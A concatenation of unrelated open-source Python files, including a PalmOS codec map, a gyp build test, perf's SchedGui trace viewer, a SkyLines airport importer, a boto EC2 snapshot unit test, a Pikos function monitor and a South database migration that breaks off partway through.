    return codecs.CodecInfo(
        name='palmos',
        encode=codec.encode,
        decode=codec.decode,
        incrementalencoder=IncrementalEncoder,
        incrementaldecoder=IncrementalDecoder,
        streamreader=StreamReader,
        streamwriter=StreamWriter,
    )
### Decoding Map
# Start from the identity byte->codepoint mapping, then patch in the
# PalmOS-specific slots below.
decoding_map = codecs.make_identity_dict(range(256))
# The PalmOS character set is mostly iso-8859-1 with some differences.
decoding_map.update({
    0x0080: 0x20ac, # EURO SIGN
    0x0082: 0x201a, # SINGLE LOW-9 QUOTATION MARK
    0x0083: 0x0192, # LATIN SMALL LETTER F WITH HOOK
    0x0084: 0x201e, # DOUBLE LOW-9 QUOTATION MARK
    0x0085: 0x2026, # HORIZONTAL ELLIPSIS
    0x0086: 0x2020, # DAGGER
    0x0087: 0x2021, # DOUBLE DAGGER
    0x0088: 0x02c6, # MODIFIER LETTER CIRCUMFLEX ACCENT
    0x0089: 0x2030, # PER MILLE SIGN
    0x008a: 0x0160, # LATIN CAPITAL LETTER S WITH CARON
    0x008b: 0x2039, # SINGLE LEFT-POINTING ANGLE QUOTATION MARK
    0x008c: 0x0152, # LATIN CAPITAL LIGATURE OE
    0x008d: 0x2666, # BLACK DIAMOND SUIT
    0x008e: 0x2663, # BLACK CLUB SUIT
    0x008f: 0x2665, # BLACK HEART SUIT
    0x0090: 0x2660, # BLACK SPADE SUIT
    0x0091: 0x2018, # LEFT SINGLE QUOTATION MARK
    0x0092: 0x2019, # RIGHT SINGLE QUOTATION MARK
    0x0093: 0x201c, # LEFT DOUBLE QUOTATION MARK
    0x0094: 0x201d, # RIGHT DOUBLE QUOTATION MARK
    0x0095: 0x2022, # BULLET
    0x0096: 0x2013, # EN DASH
    0x0097: 0x2014, # EM DASH
    0x0098: 0x02dc, # SMALL TILDE
    0x0099: 0x2122, # TRADE MARK SIGN
    0x009a: 0x0161, # LATIN SMALL LETTER S WITH CARON
    0x009c: 0x0153, # LATIN SMALL LIGATURE OE
    0x009f: 0x0178, # LATIN CAPITAL LETTER Y WITH DIAERESIS
})
# The encoding map is the inverse of the decoding map.
encoding_map = codecs.make_encoding_map(decoding_map)
|
overra/node-gyp | refs/heads/master | gyp/test/sibling/gyptest-all.py | 104 | #!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
"""
import TestGyp
# Generate and build the sibling-directory project, then verify that both
# programs were produced and run.
test = TestGyp.TestGyp()
test.run_gyp('build/all.gyp', chdir='src')
test.build('build/all.gyp', test.ALL, chdir='src')
# Default location of the built executables for most generators.
chdir = 'src/build'
# The top-level Makefile is in the directory where gyp was run.
# TODO(mmoss) Should the Makefile go in the directory of the passed in .gyp
# file? What about when passing in multiple .gyp files? Would sub-project
# Makefiles (see http://codereview.chromium.org/340008 comments) solve this?
if test.format in ('make', 'ninja'):
    chdir = 'src'
# Xcode places each target's output under its own project directory.
if test.format == 'xcode':
    chdir = 'src/prog1'
test.run_built_executable('program1',
                          chdir=chdir,
                          stdout="Hello from prog1.c\n")
if test.format == 'xcode':
    chdir = 'src/prog2'
test.run_built_executable('program2',
                          chdir=chdir,
                          stdout="Hello from prog2.c\n")
test.pass_test()
|
Joshndroid/kernel_samsung_lt03wifi | refs/heads/test1 | tools/perf/scripts/python/Perf-Trace-Util/lib/Perf/Trace/SchedGui.py | 12980 | # SchedGui.py - Python extension for perf script, basic GUI code for
# traces drawing and overview.
#
# Copyright (C) 2010 by Frederic Weisbecker <fweisbec@gmail.com>
#
# This software is distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
try:
import wx
except ImportError:
raise ImportError, "You need to install the wxpython lib for this script"
class RootFrame(wx.Frame):
    """Top-level wx window that draws scheduler-trace rectangles on a
    scrollable, zoomable canvas and forwards mouse/keyboard events to the
    sched_tracer object that owns the data."""

    # Vertical layout constants, in pixels.
    Y_OFFSET = 100
    RECT_HEIGHT = 100
    RECT_SPACE = 50
    EVENT_MARKING_WIDTH = 5

    def __init__(self, sched_tracer, title, parent = None, id = -1):
        wx.Frame.__init__(self, parent, id, title)

        (self.screen_width, self.screen_height) = wx.GetDisplaySize()
        self.screen_width -= 10
        self.screen_height -= 10
        self.zoom = 0.5
        self.scroll_scale = 20
        self.sched_tracer = sched_tracer
        # Let the tracer call back into this window (e.g. update_summary).
        self.sched_tracer.set_root_win(self)
        (self.ts_start, self.ts_end) = sched_tracer.interval()
        self.update_width_virtual()
        self.nr_rects = sched_tracer.nr_rectangles() + 1
        # One row of RECT_HEIGHT + RECT_SPACE per rectangle, below Y_OFFSET.
        self.height_virtual = RootFrame.Y_OFFSET + (self.nr_rects * (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE))

        # whole window panel
        self.panel = wx.Panel(self, size=(self.screen_width, self.screen_height))

        # scrollable container
        self.scroll = wx.ScrolledWindow(self.panel)
        self.scroll.SetScrollbars(self.scroll_scale, self.scroll_scale, self.width_virtual / self.scroll_scale, self.height_virtual / self.scroll_scale)
        self.scroll.EnableScrolling(True, True)
        self.scroll.SetFocus()

        # scrollable drawing area
        self.scroll_panel = wx.Panel(self.scroll, size=(self.screen_width - 15, self.screen_height / 2))
        self.scroll_panel.Bind(wx.EVT_PAINT, self.on_paint)
        self.scroll_panel.Bind(wx.EVT_KEY_DOWN, self.on_key_press)
        self.scroll_panel.Bind(wx.EVT_LEFT_DOWN, self.on_mouse_down)

        self.scroll.Bind(wx.EVT_PAINT, self.on_paint)
        self.scroll.Bind(wx.EVT_KEY_DOWN, self.on_key_press)
        self.scroll.Bind(wx.EVT_LEFT_DOWN, self.on_mouse_down)

        self.scroll.Fit()
        self.Fit()

        self.scroll_panel.SetDimensions(-1, -1, self.width_virtual, self.height_virtual, wx.SIZE_USE_EXISTING)

        # Summary text widget, created lazily by update_summary().
        self.txt = None

        self.Show(True)

    def us_to_px(self, val):
        # Timestamp delta -> horizontal pixels at the current zoom.
        # NOTE(review): the 10**3 divisor suggests `val` arrives in a finer
        # unit than the name implies — confirm against sched_tracer.
        return val / (10 ** 3) * self.zoom

    def px_to_us(self, val):
        # Inverse of us_to_px.
        return (val / self.zoom) * (10 ** 3)

    def scroll_start(self):
        # Current scroll origin, converted from scroll units to pixels.
        (x, y) = self.scroll.GetViewStart()
        return (x * self.scroll_scale, y * self.scroll_scale)

    def scroll_start_us(self):
        # Current horizontal scroll origin, as a timestamp offset.
        (x, y) = self.scroll_start()
        return self.px_to_us(x)

    def paint_rectangle_zone(self, nr, color, top_color, start, end):
        """Draw rectangle row `nr` spanning [start, end]; `top_color`, when
        given, paints a thin event-marking strip along the top edge."""
        offset_px = self.us_to_px(start - self.ts_start)
        width_px = self.us_to_px(end - self.ts_start)

        offset_py = RootFrame.Y_OFFSET + (nr * (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE))
        width_py = RootFrame.RECT_HEIGHT

        dc = self.dc

        if top_color is not None:
            (r, g, b) = top_color
            top_color = wx.Colour(r, g, b)
            brush = wx.Brush(top_color, wx.SOLID)
            dc.SetBrush(brush)
            dc.DrawRectangle(offset_px, offset_py, width_px, RootFrame.EVENT_MARKING_WIDTH)
            width_py -= RootFrame.EVENT_MARKING_WIDTH
            offset_py += RootFrame.EVENT_MARKING_WIDTH

        (r ,g, b) = color
        color = wx.Colour(r, g, b)
        brush = wx.Brush(color, wx.SOLID)
        dc.SetBrush(brush)
        dc.DrawRectangle(offset_px, offset_py, width_px, width_py)

    def update_rectangles(self, dc, start, end):
        # Ask the tracer to (re)paint the visible timestamp window.
        start += self.ts_start
        end += self.ts_start
        self.sched_tracer.fill_zone(start, end)

    def on_paint(self, event):
        # Repaint only the currently visible horizontal slice.
        dc = wx.PaintDC(self.scroll_panel)
        self.dc = dc

        width = min(self.width_virtual, self.screen_width)
        (x, y) = self.scroll_start()
        start = self.px_to_us(x)
        end = self.px_to_us(x + width)
        self.update_rectangles(dc, start, end)

    def rect_from_ypixel(self, y):
        """Map a y pixel to a rectangle row index, or -1 if the pixel falls
        outside every row (in the spacing or above/below the drawing)."""
        y -= RootFrame.Y_OFFSET
        rect = y / (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE)
        height = y % (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE)

        if rect < 0 or rect > self.nr_rects - 1 or height > RootFrame.RECT_HEIGHT:
            return -1
        return rect

    def update_summary(self, txt):
        # Replace the previous summary widget; wx.StaticText can't be re-set
        # in place here, so destroy and recreate it.
        if self.txt:
            self.txt.Destroy()
        self.txt = wx.StaticText(self.panel, -1, txt, (0, (self.screen_height / 2) + 50))

    def on_mouse_down(self, event):
        # Translate the click into (row, timestamp) and hand it to the tracer.
        (x, y) = event.GetPositionTuple()
        rect = self.rect_from_ypixel(y)
        if rect == -1:
            return

        t = self.px_to_us(x) + self.ts_start

        self.sched_tracer.mouse_down(rect, t)

    def update_width_virtual(self):
        self.width_virtual = self.us_to_px(self.ts_end - self.ts_start)

    def __zoom(self, x):
        # Recompute the virtual width and keep timestamp `x` at the left edge.
        self.update_width_virtual()
        (xpos, ypos) = self.scroll.GetViewStart()
        xpos = self.us_to_px(x) / self.scroll_scale
        self.scroll.SetScrollbars(self.scroll_scale, self.scroll_scale, self.width_virtual / self.scroll_scale, self.height_virtual / self.scroll_scale, xpos, ypos)
        self.Refresh()

    def zoom_in(self):
        x = self.scroll_start_us()
        self.zoom *= 2
        self.__zoom(x)

    def zoom_out(self):
        x = self.scroll_start_us()
        self.zoom /= 2
        self.__zoom(x)

    def on_key_press(self, event):
        # '+'/'-' zoom; arrow keys scroll by one scroll unit.
        key = event.GetRawKeyCode()
        if key == ord("+"):
            self.zoom_in()
            return
        if key == ord("-"):
            self.zoom_out()
            return

        key = event.GetKeyCode()
        (x, y) = self.scroll.GetViewStart()
        if key == wx.WXK_RIGHT:
            self.scroll.Scroll(x + 1, y)
        elif key == wx.WXK_LEFT:
            self.scroll.Scroll(x - 1, y)
        elif key == wx.WXK_DOWN:
            self.scroll.Scroll(x, y + 1)
        elif key == wx.WXK_UP:
            self.scroll.Scroll(x, y - 1)
|
TobiasLohner/SkyLines | refs/heads/master | skylines/commands/import_/welt2000.py | 3 | from flask.ext.script import Command, Option
from skylines.database import db
from skylines.model import Airport
from skylines.lib.waypoints.welt2000 import get_database
from datetime import datetime
from sqlalchemy.sql.expression import or_, and_
class Welt2000(Command):
    """ Import all airports from the WELT2000 project """

    option_list = (
        Option('--commit', action='store_true',
               help='commit changes. Otherwise no changes are made to the database'),
        Option('welt2000_path', nargs='?', metavar='WELT2000.TXT',
               help='path to the WELT2000 file'),
    )

    def run(self, commit, welt2000_path):
        # Sync the Airport table with the WELT2000 file: add new airports,
        # update matched ones, and invalidate those no longer present.
        # Changes are only committed when --commit was given.
        welt2000 = get_database(path=welt2000_path)

        # All rows touched in this run get this timestamp; anything older
        # is considered stale at the end.
        self.current_date = datetime.utcnow()
        i = 0

        for airport_w2k in welt2000:
            # Only these three waypoint types are imported.
            if (airport_w2k.type != 'airport' and
                    airport_w2k.type != 'glider_site' and
                    airport_w2k.type != 'ulm'):
                continue

            i += 1
            if i % 100 == 0:
                db.session.flush()

            print str(i) + ": " + airport_w2k.country_code + " " + airport_w2k.name

            # try to find this airport in the database
            near_airport = Airport.query() \
                .filter(and_(Airport.short_name == airport_w2k.short_name,
                             Airport.country_code == airport_w2k.country_code)) \
                .filter(or_(Airport.valid_until == None, Airport.valid_until > self.current_date)) \
                .first()

            # fall back to location-search if airport is not found
            # and only reuse this airport if it's within 250 meters of the old one...
            if near_airport is None or near_airport.distance(airport_w2k) > 250:
                near_airport = Airport.by_location(airport_w2k, distance_threshold=0.0025)

            if near_airport is None:
                # this airport is not in our database yet. add it...
                self.add_airport(airport_w2k)
            else:
                # seems to be the same airport. update with current values
                self.show_differences(near_airport, airport_w2k)
                self.update_airport(near_airport, airport_w2k)

        db.session.flush()

        # now invalidate all remaining airports
        # (anything not touched above still has an older time_modified)
        invalid_airports = Airport.query() \
            .filter(Airport.time_modified < self.current_date) \
            .filter(or_(Airport.valid_until == None, Airport.valid_until > self.current_date))

        for airport in invalid_airports:
            print "{} {} {}" \
                .format(airport.country_code, airport.name, airport.icao)
            print "  invalidated"
            airport.valid_until = self.current_date

        if commit:
            db.session.commit()

    def add_airport(self, airport_w2k):
        # Create a fresh Airport row populated from the WELT2000 record.
        airport = Airport()
        self.update_airport(airport, airport_w2k)
        db.session.add(airport)

    def update_airport(self, airport, airport_w2k):
        # Copy all imported fields and stamp the row as touched in this run.
        airport.location = airport_w2k
        airport.altitude = airport_w2k.altitude

        airport.name = airport_w2k.name
        airport.short_name = airport_w2k.short_name
        airport.icao = airport_w2k.icao
        airport.country_code = airport_w2k.country_code
        airport.surface = airport_w2k.surface
        airport.runway_len = airport_w2k.runway_len
        airport.runway_dir = airport_w2k.runway_dir
        airport.frequency = airport_w2k.freq
        airport.type = airport_w2k.type

        airport.time_modified = self.current_date

    def show_differences(self, airport, airport_w2k):
        # Print changed columns and any location shift > 0.1 m for review.
        row2dict = lambda r: {c.name: getattr(r, c.name) for c in r.__table__.columns}
        diff = DictDiffer(row2dict(airport), airport_w2k.__dict__)
        changed = diff.changed()
        distance = airport.distance(airport_w2k)
        if changed or distance > 0.1:
            print "{} {} {}" \
                .format(airport.country_code, airport.name, airport.icao)

            if distance > 0.1:
                print "  moved by {}m".format(distance)

            for item in changed:
                print "  {} from {} to {}" \
                    .format(item, row2dict(airport)[item], airport_w2k.__dict__[item])
class DictDiffer(object):
    """
    Calculate the difference between two dictionaries as:
    (1) items added
    (2) items removed
    (3) keys same in both but changed values
    (4) keys same in both and unchanged values
    """

    def __init__(self, current_dict, past_dict):
        self.current_dict = current_dict
        self.past_dict = past_dict
        self.set_current = set(current_dict.keys())
        self.set_past = set(past_dict.keys())
        self.intersect = self.set_current.intersection(self.set_past)

    def added(self):
        # Keys only present in the current dict.
        return self.set_current - self.intersect

    def removed(self):
        # Keys only present in the past dict.
        return self.set_past - self.intersect

    def changed(self):
        # Shared keys whose values differ.
        return set(key for key in self.intersect
                   if self.past_dict[key] != self.current_dict[key])

    def unchanged(self):
        # Shared keys whose values are equal.
        return set(key for key in self.intersect
                   if self.past_dict[key] == self.current_dict[key])
|
drbild/boto | refs/heads/develop | tests/unit/ec2/test_snapshot.py | 114 | from tests.compat import OrderedDict
from tests.unit import AWSMockServiceTestCase
from boto.ec2.connection import EC2Connection
from boto.ec2.snapshot import Snapshot
class TestDescribeSnapshots(AWSMockServiceTestCase):
    """Unit test for EC2Connection.get_all_snapshots against a canned
    DescribeSnapshots response (no network access)."""

    connection_class = EC2Connection

    def default_body(self):
        # Canned XML body the mock service returns for every request.
        return b"""
            <DescribeSnapshotsResponse xmlns="http://ec2.amazonaws.com/doc/2013-10-01/">
                <requestId>59dbff89-35bd-4eac-99ed-be587EXAMPLE</requestId>
                <snapshotSet>
                    <item>
                        <snapshotId>snap-1a2b3c4d</snapshotId>
                        <volumeId>vol-1a2b3c4d</volumeId>
                        <status>pending</status>
                        <startTime>YYYY-MM-DDTHH:MM:SS.SSSZ</startTime>
                        <progress>30%</progress>
                        <ownerId>111122223333</ownerId>
                        <volumeSize>15</volumeSize>
                        <description>Daily Backup</description>
                        <tagSet>
                            <item>
                                <key>Purpose</key>
                                <value>demo_db_14_backup</value>
                            </item>
                        </tagSet>
                        <encrypted>false</encrypted>
                    </item>
                </snapshotSet>
            </DescribeSnapshotsResponse>
        """

    def test_describe_snapshots(self):
        # Verify that every call argument is serialized into the expected
        # request parameters, and the XML is parsed into Snapshot objects.
        # OrderedDict keeps the filters in a deterministic order so the
        # Filter.N parameter numbering is stable.
        self.set_http_response(status_code=200)
        response = self.service_connection.get_all_snapshots(['snap-1a2b3c4d', 'snap-9f8e7d6c'],
                                                             owner=['self', '111122223333'],
                                                             restorable_by='999988887777',
                                                             filters=OrderedDict((('status', 'pending'),
                                                                                  ('tag-value', '*db_*'))))
        self.assert_request_parameters({
            'Action': 'DescribeSnapshots',
            'SnapshotId.1': 'snap-1a2b3c4d',
            'SnapshotId.2': 'snap-9f8e7d6c',
            'Owner.1': 'self',
            'Owner.2': '111122223333',
            'RestorableBy.1': '999988887777',
            'Filter.1.Name': 'status',
            'Filter.1.Value.1': 'pending',
            'Filter.2.Name': 'tag-value',
            'Filter.2.Value.1': '*db_*'},
            ignore_params_values=['AWSAccessKeyId', 'SignatureMethod',
                                  'SignatureVersion', 'Timestamp',
                                  'Version'])
        self.assertEqual(len(response), 1)
        self.assertIsInstance(response[0], Snapshot)
        self.assertEqual(response[0].id, 'snap-1a2b3c4d')
|
osvalr/odoo | refs/heads/8.0 | addons/base_import_module/tests/test_module/__openerp__.py | 377 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2013-Today OpenERP SA (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
# Module manifest for the dummy "Test Module" used by the
# base_import_module import tests.
{
    'name': 'Test Module',
    'category': 'Website',
    'summary': 'Custom',
    'version': '1.0',
    'description': """
Test
""",
    'author': 'OpenERP SA',
    'depends': ['website'],
    'data': [
        'test.xml',
    ],
    'installable': True,
    'application': True,
}
|
enthought/pikos | refs/heads/master | pikos/monitors/function_monitor.py | 1 | # -*- coding: utf-8 -*-
#------------------------------------------------------------------------------
# Package: Pikos toolkit
# File: monitors/function_monitor.py
# License: LICENSE.TXT
#
# Copyright (c) 2012, Enthought, Inc.
# All rights reserved.
#------------------------------------------------------------------------------
from __future__ import absolute_import
from pikos._internal.profile_function_manager import ProfileFunctionManager
from pikos._internal.keep_track import KeepTrack
from pikos.monitors.monitor import Monitor
from pikos.monitors.records import FunctionRecord
class FunctionMonitor(Monitor):
    """ Record python function events.

    The class hooks on the setprofile function to receive function events and
    record them.
    """

    def __init__(self, recorder, record_type=None):
        """ Initialize the monitoring class.

        Parameters
        ----------
        recorder : object
            A subclass of :class:`~.AbstractRecorder` or a class that
            implements the same interface to handle the values to be logged.

        record_type : type
            A class object to be used for records. Default is
            :class:`~.FunctionRecord`.

        """
        self._recorder = recorder
        # Cache the bound method so each event avoids an attribute lookup.
        self._record = recorder.record
        self._profiler = ProfileFunctionManager()
        # Monotonically increasing event counter, stored in every record.
        self._index = 0
        # Balances enable()/disable() so nested use installs the hook once.
        self._call_tracker = KeepTrack()
        if record_type is None:
            self._record_type = FunctionRecord
        else:
            self._record_type = record_type
        # Plain tuples skip record-type construction in the hot event path.
        self._use_tuple = self._record_type is tuple

    def enable(self):
        """ Enable the monitor.

        The first time the method is called (the context is entered) it will
        set the setprofile hooks and initialize the recorder.

        """
        if self._call_tracker('ping'):
            self._recorder.prepare(self._record_type)
            self._profiler.replace(self.on_function_event)

    def disable(self):
        """ Disable the monitor.

        The last time the method is called (the context is exited) it will
        unset the setprofile hooks and finalize the recorder.

        """
        if self._call_tracker('pong'):
            self._profiler.recover()
            self._recorder.finalize()

    def on_function_event(self, frame, event, arg):
        """ Record the current function event.

        Called on function events, it will retrieve the necessary information
        from the `frame`, create a :class:`FunctionRecord` and send it to the
        recorder.

        """
        record = self.gather_info(frame, event, arg)
        if not self._use_tuple:
            record = self._record_type(*record)
        self._record(record)
        self._index += 1

    def gather_info(self, frame, event, arg):
        """ Gather information for the record.

        Returns a (index, event, function-name, lineno, filename) tuple.

        """
        if '_' == event[1]:
            # Events with '_' at index 1 ('c_call', 'c_return', 'c_exception')
            # carry the C function object in `arg`; take the name from it.
            return (
                self._index, event, arg.__name__,
                frame.f_lineno, frame.f_code.co_filename)
        else:
            # Plain Python 'call'/'return'/'exception': use the frame's code.
            code = frame.f_code
            return (
                self._index, event, code.co_name,
                frame.f_lineno, code.co_filename)
|
driftx/Telephus | refs/heads/master | examples/deferreds/supercolumn.py | 12133432 | |
helenst/django | refs/heads/master | tests/empty/no_models/__init__.py | 12133432 | |
yetilinux/yetiweb | refs/heads/master | packages/migrations/0010_auto__add_signoffspecification.py | 4 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
    # Create the packages_signoffspecification table backing the new
    # SignoffSpecification model.
    db.create_table('packages_signoffspecification', (
        ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
        ('pkgbase', self.gf('django.db.models.fields.CharField')(max_length=255, db_index=True)),
        ('pkgver', self.gf('django.db.models.fields.CharField')(max_length=255)),
        ('pkgrel', self.gf('django.db.models.fields.CharField')(max_length=255)),
        ('epoch', self.gf('django.db.models.fields.PositiveIntegerField')(default=0)),
        ('arch', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['main.Arch'])),
        ('repo', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['main.Repo'])),
        ('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])),
        ('created', self.gf('django.db.models.fields.DateTimeField')()),
        ('required', self.gf('django.db.models.fields.PositiveIntegerField')(default=2)),
        ('enabled', self.gf('django.db.models.fields.BooleanField')(default=True)),
        ('known_bad', self.gf('django.db.models.fields.BooleanField')(default=False)),
        ('comments', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
    ))
    db.send_create_signal('packages', ['SignoffSpecification'])
def backwards(self, orm):
db.delete_table('packages_signoffspecification')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'main.arch': {
'Meta': {'ordering': "['name']", 'object_name': 'Arch', 'db_table': "'arches'"},
'agnostic': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'})
},
'main.package': {
'Meta': {'ordering': "('pkgname',)", 'object_name': 'Package', 'db_table': "'packages'"},
'arch': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'packages'", 'to': "orm['main.Arch']"}),
'build_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'compressed_size': ('main.models.PositiveBigIntegerField', [], {}),
'epoch': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'filename': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'files_last_update': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'flag_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'installed_size': ('main.models.PositiveBigIntegerField', [], {}),
'last_update': ('django.db.models.fields.DateTimeField', [], {}),
'packager': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True'}),
'packager_str': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'pgp_signature': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'pkgbase': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'pkgdesc': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'pkgname': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'pkgrel': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'pkgver': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'repo': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'packages'", 'to': "orm['main.Repo']"}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'})
},
'main.repo': {
'Meta': {'ordering': "['name']", 'object_name': 'Repo', 'db_table': "'repos'"},
'bugs_category': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'bugs_project': ('django.db.models.fields.SmallIntegerField', [], {'default': '1'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'staging': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'svn_root': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'testing': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'packages.conflict': {
'Meta': {'ordering': "['name']", 'object_name': 'Conflict'},
'comparison': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'pkg': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'conflicts'", 'to': "orm['main.Package']"}),
'version': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255'})
},
'packages.license': {
'Meta': {'ordering': "['name']", 'object_name': 'License'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'pkg': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'licenses'", 'to': "orm['main.Package']"})
},
'packages.packagegroup': {
'Meta': {'object_name': 'PackageGroup'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'pkg': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'groups'", 'to': "orm['main.Package']"})
},
'packages.packagerelation': {
'Meta': {'unique_together': "(('pkgbase', 'user', 'type'),)", 'object_name': 'PackageRelation'},
'created': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'pkgbase': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'type': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'package_relations'", 'to': "orm['auth.User']"})
},
'packages.provision': {
'Meta': {'ordering': "['name']", 'object_name': 'Provision'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'pkg': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'provides'", 'to': "orm['main.Package']"}),
'version': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255'})
},
'packages.replacement': {
'Meta': {'ordering': "['name']", 'object_name': 'Replacement'},
'comparison': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'pkg': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'replaces'", 'to': "orm['main.Package']"}),
'version': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255'})
},
'packages.signoff': {
'Meta': {'object_name': 'Signoff'},
'arch': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['main.Arch']"}),
'comments': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {}),
